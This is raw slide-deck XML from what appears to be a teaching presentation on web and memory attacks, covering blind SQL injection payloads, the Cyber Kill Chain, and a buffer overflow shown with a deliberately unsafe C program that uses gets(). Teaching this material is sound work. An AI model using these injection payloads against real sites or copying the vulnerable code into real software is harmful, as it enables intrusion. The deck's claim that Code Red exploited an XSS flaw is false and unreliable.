        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;p7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41" name="Google Shape;1041;p7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42" name="Google Shape;1042;p7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43" name="Google Shape;1043;p7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044" name="Google Shape;1044;p7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045" name="Google Shape;1045;p7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046" name="Google Shape;1046;p7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047" name="Google Shape;1047;p7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048" name="Google Shape;1048;p7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1049" name="Google Shape;1049;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Output: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Scenario 1 (True Condition):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server takes 5 seconds to respond.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indicates that the first character of the database name is 'a'.</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Scenario 2 (False Condition):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server responds immediately.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indicates that the injected condition is false.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Example Attack Flow:</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Attacker sends the manipulated URL: https://example.com/search?query=' OR IF(1=1, SLEEP(5), 0)--'</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Server delays its response for 5 seconds, confirming that the condition is true.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Attacker adjusts the payload to check for the next character.</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Iterates until the entire database name is revealed.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iterative process allows the attacker to extract information character by character, eventually revealing the contents of the database.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050" name="Google Shape;1050;p7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7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56" name="Google Shape;1056;p7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57" name="Google Shape;1057;p7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58" name="Google Shape;1058;p7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059" name="Google Shape;1059;p7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060" name="Google Shape;1060;p7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061" name="Google Shape;1061;p7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062" name="Google Shape;1062;p7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063" name="Google Shape;1063;p7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1064" name="Google Shape;1064;p74"/>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Blind SQL Injection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Blind SQL injection occurs when an attacker injects malicious SQL code into an application, but unlike classic SQL injection, the attacker doesn't directly see the results of the injected query. Instead, they infer success or failure based on the application's behavior.</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Scenario:</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Let's consider a hypothetical scenario where there's a vulnerable login page in a web application. The URL for the login page is something like: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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>https://example.com/login?username=user&amp;password=pass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" i="0" u="sng"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Normal SQL Query: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application might use an SQL query like the following to check user credentials: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SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';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065" name="Google Shape;1065;p7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7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71" name="Google Shape;1071;p7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72" name="Google Shape;1072;p7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73" name="Google Shape;1073;p7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074" name="Google Shape;1074;p7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075" name="Google Shape;1075;p7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076" name="Google Shape;1076;p7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077" name="Google Shape;1077;p7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078" name="Google Shape;1078;p7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1079" name="Google Shape;1079;p75"/>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Blind SQL Injection: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Now, let's assume the application is vulnerable to blind SQL injection in the username parameter. The attacker wants to bypass the login and access sensitive information.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Example URL with Blind SQL Injection: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https://example.com/login?username=admin' AND '1'='1'--</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Modified SQL Query:</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injected SQL query might look like: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SELECT * FROM users WHERE username = 'admin' AND '1'='1'--' AND password = 'input_password';</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Blind SQL Injection Payload:</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attacker injects ' AND '1'='1'-- into the username parameter.</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double hyphen (--) is used to comment out the remaining part of the original query.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="Google Shape;1080;p7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sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;p7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086" name="Google Shape;1086;p7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087" name="Google Shape;1087;p7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088" name="Google Shape;1088;p7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089" name="Google Shape;1089;p7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090" name="Google Shape;1090;p7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091" name="Google Shape;1091;p7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092" name="Google Shape;1092;p7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093" name="Google Shape;1093;p7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Types of SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Injected SQL Query:</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injected query becomes SELECT * FROM users WHERE username = 'admin' AND '1'='1'--' AND password = 'input_password';.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condition '1'='1' always evaluates to true, so the injected part of the query is essentially saying "if 1 equals 1".</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Inference:</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If the application behaves as usual (e.g., allows login or shows a successful login message), the attacker infers that the injected condition is true.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If the application behaves differently (e.g., denies access or shows an error), the attacker infers that the injected condition is false.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p7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sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p7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101" name="Google Shape;1101;p7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102" name="Google Shape;1102;p7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103" name="Google Shape;1103;p7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104" name="Google Shape;1104;p7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105" name="Google Shape;1105;p7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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1517650" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1107" name="Google Shape;1107;p7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7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="76200"/>
              <a:ext cx="660400" cy="660400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="120005"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3699" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p7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110" name="Google Shape;1110;p7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111" name="Google Shape;1111;p7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Cyber Kill Chain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17342450" cy="24456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cyber kill chain is a framework used in cybersecurity to understand and analyze the stages of a cyberattack, from the initial reconnaissance to the final objective of the attacker. It was developed by defense contractor Lockheed Martin and is often used to improve an organization's defense strategy by identifying and mitigating threats at each stage of the attack lifecycle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p7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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3895725" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Google Shape;1115;p7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77"/>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120005"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3599" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>II</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1117" name="Google Shape;1117;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6273800" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;p7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77"/>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600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>III</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8651875" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1121" name="Google Shape;1121;p7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77"/>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600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>IV</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11029950" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;p7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77"/>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600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13408025" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1127" name="Google Shape;1127;p7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7"/>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600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>VI</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15789275" y="4497388"/>
            <a:ext cx="1292225" cy="1292225"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1130" name="Google Shape;1130;p7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77"/>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3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Light"/>
                  <a:ea typeface="Roboto Condensed Light"/>
                  <a:cs typeface="Roboto Condensed Light"/>
                  <a:sym typeface="Roboto Condensed Light"/>
                </a:rPr>
                <a:t>VII</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="-259323" y="7524997"/>
            <a:ext cx="4065863" cy="58039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RECONNAISSANCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="1958066" y="7546471"/>
            <a:ext cx="4065863" cy="58039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WEAPONISATION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="4336141" y="7524997"/>
            <a:ext cx="4065863" cy="58039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DELIVERY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="6874902" y="7524997"/>
            <a:ext cx="4065863" cy="58039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EXPLOITATION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="9214288" y="7162914"/>
            <a:ext cx="4065863" cy="580390"/>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INSTALLATION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137" name="Google Shape;1137;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="11762676" y="6977411"/>
            <a:ext cx="4065863" cy="118046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COMMAND AND CONTROL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4618105">
            <a:off x="14015267" y="6795221"/>
            <a:ext cx="4065863" cy="1180465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="140011"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ACTIONS ON OBJECTIVES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7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144" name="Google Shape;1144;p7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145" name="Google Shape;1145;p7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146" name="Google Shape;1146;p7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147" name="Google Shape;1147;p7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148" name="Google Shape;1148;p7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149" name="Google Shape;1149;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11407449" y="1028700"/>
            <a:ext cx="4553602" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4553602" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4553602" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4553602" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p7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151" name="Google Shape;1151;p7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152" name="Google Shape;1152;p7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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="9309700" cy="39029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buffer overflow is a type of security vulnerability that occurs when a program writes more data to a block of memory, or buffer, than it was allocated for. This can lead to unpredictable behavior, crashes, or even unauthorized access to a system. Buffer overflow attacks take advantage of this vulnerability to execute arbitrary code or manipulate the program's normal operation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p7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7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160" name="Google Shape;1160;p7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161" name="Google Shape;1161;p7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162" name="Google Shape;1162;p7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163" name="Google Shape;1163;p7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164" name="Google Shape;1164;p7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165" name="Google Shape;1165;p7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166" name="Google Shape;1166;p7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167" name="Google Shape;1167;p7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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Let's consider a simplified scenario to understand a buffer overflow attack:</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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Scenario: Password Authentication Program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" i="0" u="sng"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Imagine a basic program that prompts a user for a password and checks if it matches the expected password. Here's a simplified C program:</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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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int authenticateUser(char *input)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char password[12];</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int auth = 0;</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p7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73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p8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175" name="Google Shape;1175;p8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176" name="Google Shape;1176;p8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177" name="Google Shape;1177;p8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178" name="Google Shape;1178;p8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179" name="Google Shape;1179;p8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180" name="Google Shape;1180;p8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181" name="Google Shape;1181;p8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182" name="Google Shape;1182;p8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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p80"/>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strcpy(password, "securepass");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if (strcmp(input, password) == 0)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auth = 1;</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return auth;</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int main()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char userInput[20];</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printf("Enter your password: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gets(userInput);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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p8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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p8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190" name="Google Shape;1190;p8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191" name="Google Shape;1191;p8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192" name="Google Shape;1192;p8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193" name="Google Shape;1193;p8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194" name="Google Shape;1194;p8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195" name="Google Shape;1195;p8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196" name="Google Shape;1196;p8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197" name="Google Shape;1197;p8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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="58460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if (authenticateUser(userInput))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printf("Authentication successful!\n");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 else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printf("Authentication failed.\n");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return 0;</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 this program, there's a buffer (password) that is allocated to hold 12 characters. The gets function is used to take user input, which can lead to a buffer overflow because it doesn't perform bounds checking.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p8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84" name="Google Shape;184;p1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85" name="Google Shape;185;p1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86" name="Google Shape;186;p1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87" name="Google Shape;187;p1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88" name="Google Shape;188;p1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89" name="Google Shape;189;p1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90" name="Google Shape;190;p1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91" name="Google Shape;191;p1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ATTACKS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918577" y="1257301"/>
            <a:ext cx="16915665"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Cross-Site Scripting (XSS) Attacks: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Definition: Injects malicious scripts into web pages viewed by other users.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Samy Worm (MySpace, 2005): Worm spread through XSS, adding the author as a friend on MySpace.</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Code Red Worm (2001): Exploited an XSS vulnerability in Microsoft IIS servers.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Zero-Day Exploits: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Definition: Targets vulnerabilities in software or hardware that are not yet known to the vendor or public.</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Examples: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Stuxnet (2010): Exploited zero-day vulnerabilities in Windows to spread and compromise industrial control systems.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Meltdown and Spectre (2018): Exploited vulnerabilities in processors, affecting a wide range of devices.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193" name="Google Shape;193;p1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03"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p8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05" name="Google Shape;1205;p8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06" name="Google Shape;1206;p8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07" name="Google Shape;1207;p8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08" name="Google Shape;1208;p8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09" name="Google Shape;1209;p8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10" name="Google Shape;1210;p8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211" name="Google Shape;1211;p8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212" name="Google Shape;1212;p8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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="73033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Buffer Overflow Attack:</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Normal Authentication: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When a user enters a password within the allocated size (e.g., "securepass"), the program performs authentication successfully.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Buffer Overflow Attempt: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An attacker enters a password longer than the allocated buffer size, taking advantage of the gets function's lack of bounds checking.</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Enter your password: AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;p8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8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20" name="Google Shape;1220;p8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21" name="Google Shape;1221;p8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22" name="Google Shape;1222;p8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23" name="Google Shape;1223;p8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24" name="Google Shape;1224;p8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25" name="Google Shape;1225;p8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226" name="Google Shape;1226;p8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227" name="Google Shape;1227;p8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BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
